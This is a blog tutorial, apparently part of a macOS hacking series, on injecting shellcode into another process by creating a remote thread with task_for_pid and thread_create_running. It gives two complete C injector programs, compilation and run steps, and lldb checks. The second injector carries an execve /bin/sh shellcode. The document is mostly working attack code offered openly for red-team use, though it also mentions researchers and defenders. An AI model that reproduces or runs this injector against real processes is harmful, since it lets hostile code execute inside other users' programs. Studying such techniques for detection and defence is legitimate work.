MacOS hacking part 10: shellcode injection via task_for_pid - create remote thread. Simple C (Intel) example

8 minute read

﷽

Hello, cybersecurity enthusiasts and white hackers!

malware

In the previous post we stole an existing thread: we paused a victim, rewired its registers so RIP pointed at our buffer, and let it run. That’s thread hijacking - fast, but risky: you might grab a thread in the middle of a syscall, under a lock, or with an odd stack frame. Race conditions and crashes are common.

Today, we’re going further - instead of hijacking an existing thread, we’ll create an entirely new thread in the target process using thread_create_running. This is a cleaner and more stable technique with fewer side effects.

This technique is known as remote thread injection. While it requires similar permissions (task_for_pid), the flow is slightly different. Here’s what happens:

First of all, find the PID of the victim process.
then use task_for_pid to get the task port for the victim.
allocate memory in the remote process.
write your shellcode into that memory.
mark the memory executable.
allocate a dummy stack.
set up CPU registers (RIP to shellcode, RSP to top of dummy stack).
spawn a thread in the victim using thread_create_running.

practical example

Let’s create PoC for this technique step-by-step.

When hijacking a thread, you’re overwriting its context, resuming it, and hoping it behaves. This can crash or deadlock the process if you’re not careful. With new thread injection, we avoid all that. We get a clean, isolated thread to run our shellcode, and the rest of the process is (mostly) untouched.

First of all attach to the process as before:

pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] attached to pid %d\n", pid);

You’ll need root for this unless SIP is disabled.

Then use mach_vm_allocate() to find a page in the remote address space and allocate memory for shellcode.

mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);

kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);

Write shellcode to remote memory:

kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] wrote shellcode\n");

At the next step, flip the pages to R-X. Executing from a non-exec page triggers a BUS ERROR on macOS, so don’t skip this.

kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] set memory protections to RX\n");

Setup dummy stack:

// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));

// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;

// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
  return 1;
}

Align to 16 bytes for x86_64 ABI. Set RSP to the top of that region (minus a small red zone):

state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned

Finally, create the thread:

kr = thread_create_running(task,
  x86_THREAD_STATE64,
  (thread_state_t)&state,
  state_count,
  &thread);

if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
  return 1;
}

printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);

What is going on here? We ask the kernel to spin up a new thread in the target with your register context. The scheduler will start it at your entry point.

Finally, we need shellcode:

unsigned char shellcode[] =
  "\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
  "\x50\xbf\x01\x00\x00\x00"
  "\x48\x89\xe6\xba\x05\x00\x00\x00"
  "\xb8\x04\x00\x00\x02\x0f\x05"
  "\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";

from one our previous posts in macOS hacking series:

global start

section .text
start:
  mov rax, 0x0a776f654d     ; "\nwoeM" in little-endian
  push rax                  ; string now on stack

  mov rdi, 1                ; fd = 1 (stdout)
  mov rsi, rsp              ; pointer to "Meow\n"
  mov rdx, 5                ; length = 5 bytes
  mov rax, 0x2000004        ; syscall: write
  syscall

  mov rax, 0x2000001        ; syscall: exit
  xor rdi, rdi              ; exit code 0
  syscall

So full source code is looks like this hack.c:

/*
 * hack.c
 * macOS x86_64 shellcode injection 
 * using task_for_pid and 
 * remote thread creation
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>

unsigned char shellcode[] =
  "\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
  "\x50\xbf\x01\x00\x00\x00"
  "\x48\x89\xe6\xba\x05\x00\x00\x00"
  "\xb8\x04\x00\x00\x02\x0f\x05"
  "\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <pid>\n", argv[0]);
    return 1;
  }

  pid_t pid = atoi(argv[1]);
  task_t task;
  kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] attached to pid %d\n", pid);

  mach_vm_address_t remote_addr = 0;
  vm_size_t shellcode_size = sizeof(shellcode);

  kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] allocated memory at 0x%llx\n", remote_addr);

  kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] wrote shellcode\n");

  kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] set memory protections to RX\n");

  // setup new thread state
  x86_thread_state64_t state;
  thread_act_t thread;
  mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
  memset(&state, 0, sizeof(state));

  // set instruction pointer (rip) to our shellcode
  state.__rip = remote_addr;

  // stack pointer (rsp) should be valid; just allocate a dummy stack
  mach_vm_address_t remote_stack = 0;
  kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
    return 1;
  }
  state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned

  kr = thread_create_running(task,
    x86_THREAD_STATE64,
    (thread_state_t)&state,
    state_count,
    &thread);

  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
    return 1;
  }

  printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
  printf("[+] shellcode running in PID %d via new thread.\n", pid);

  return 0;
}

demo

Let’s go to see this in action. First of all, we need “victim” process. As usual, let me use meow.c:

/*
 * meow.c
 * victim process for macOS injection tests
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
  printf("victim process started. PID: %d\n", getpid());

  while (1) {
    printf("meow-meow... PID: %d\n", getpid());
    sleep(5); // simulate periodic activity
  }

  return 0;
}

Compile it:

clang -o meow meow.c

malware

and check:

./meow

malware

Then compile our injector:

clang -o hack hack.c

malware

And run:

./hack <PID>

malware

As you can see, everything is worked perfectly! =^..^=

practical example 2

In this case, just update my shellcode:

/*
 * hack2.c
 * macOS x86_64 shellcode injection 
 * using task_for_pid and 
 * remote thread creation
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>

unsigned char shellcode[] =
  /* 0000 */ "\x31\xf6"                                 /* xor     esi, esi                */
  /* 0002 */ "\xf7\xe6"                                 /* mul     esi                     */
  /* 0004 */ "\x0f\xba\xe8\x19"                         /* bts     eax, 0x19               */
  /* 0008 */ "\xb0\x3b"                                 /* mov     al, 0x3b                */
  /* 000A */ "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* movabs  rbx, 0x68732f2f6e69622f */
  /* 0014 */ "\x52"                                     /* push    rdx                     */
  /* 0015 */ "\x53"                                     /* push    rbx                     */
  /* 0016 */ "\x54"                                     /* push    rsp                     */
  /* 0017 */ "\x5f"                                     /* pop     rdi                     */
  /* 0018 */ "\x0f\x05";                                /* syscall                         */


int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <pid>\n", argv[0]);
    return 1;
  }

  pid_t pid = atoi(argv[1]);
  task_t task;
  kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] attached to pid %d\n", pid);

  mach_vm_address_t remote_addr = 0;
  vm_size_t shellcode_size = sizeof(shellcode);

  kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] allocated memory at 0x%llx\n", remote_addr);

  kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] wrote shellcode\n");

  kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] set memory protections to RX\n");

  // setup new thread state
  x86_thread_state64_t state;
  thread_act_t thread;
  mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
  memset(&state, 0, sizeof(state));

  // set instruction pointer (rip) to our shellcode
  state.__rip = remote_addr;

  // stack pointer (rsp) should be valid; just allocate a dummy stack
  mach_vm_address_t remote_stack = 0;
  kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
    return 1;
  }
  state.__rsp = remote_stack + 0x1000 - 8; // stack top aligned

  kr = thread_create_running(task,
    x86_THREAD_STATE64,
    (thread_state_t)&state,
    state_count,
    &thread);

  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
    return 1;
  }

  printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
  printf("[+] shellcode running in PID %d via new thread.\n", pid);

  return 0;
}

demo 2

Let’s go to see second example in action.

Compile it:

clang -o hack2 hack2.c

malware

Run victim process:

./meow

malware

Then run injector:

./hack2 <PID>

malware

As you can see, in this case also everything is worked as expected! =^..^=

For debugging purpose you can use lldb:

lldb -p <PID>
thread list

malware

After run injector, check thread list again:

thread list

malware

As you can see, new thread successfully created!

Check shellcode:

disassemble --start-address=<our_remote_address> --count=16

malware

As you can see, shellcode successfully injected and thread created! =^..^=

Unfortunately, lldb doesn’t let you search threads by address directly - you’ll have to look manually. Breakpoints can be tricky because you don’t know the shellcode address ahead of time unless printed. If your thread finishes quickly, lldb might not catch it unless you attach early.

If you want you can use lldb python scripting to auto-select the injected thread by its TID or to dump memory around RIP.

conclusion

Thread hijack shows how fragile cross-process execution can be. Remote thread creation shows the stable alternative: give your code a clean context and stack, don’t kidnap a live worker. Both leave trails; both are increasingly constrained by platform hardening. Understanding the mechanics helps defenders build better telemetry - and helps researchers avoid self-inflicted crashes.

I hope this post is useful for malware researchers, macOS/Apple security researchers, C/C++/ASM programmers, spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red teamers arsenal.

macOS hacking part 1
macOS hacking part 9
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

Share on

Twitter Facebook LinkedIn

cocomelonc

MacOS hacking part 10: shellcode injection via task_for_pid - create remote thread. Simple C (Intel) example

practical example

demo

practical example 2

demo 2

conclusion

Share on

You may also enjoy

HVCK magazine - issue 1: How to “hack” your Epson printer

Linux hacking part 8: Linux password-protected bind shell. Simple NASM example

Malware development trick 54: steal data via legit Angelcam API. Simple C example.

Malware development trick 53: steal data via legit XBOX API. Simple C example.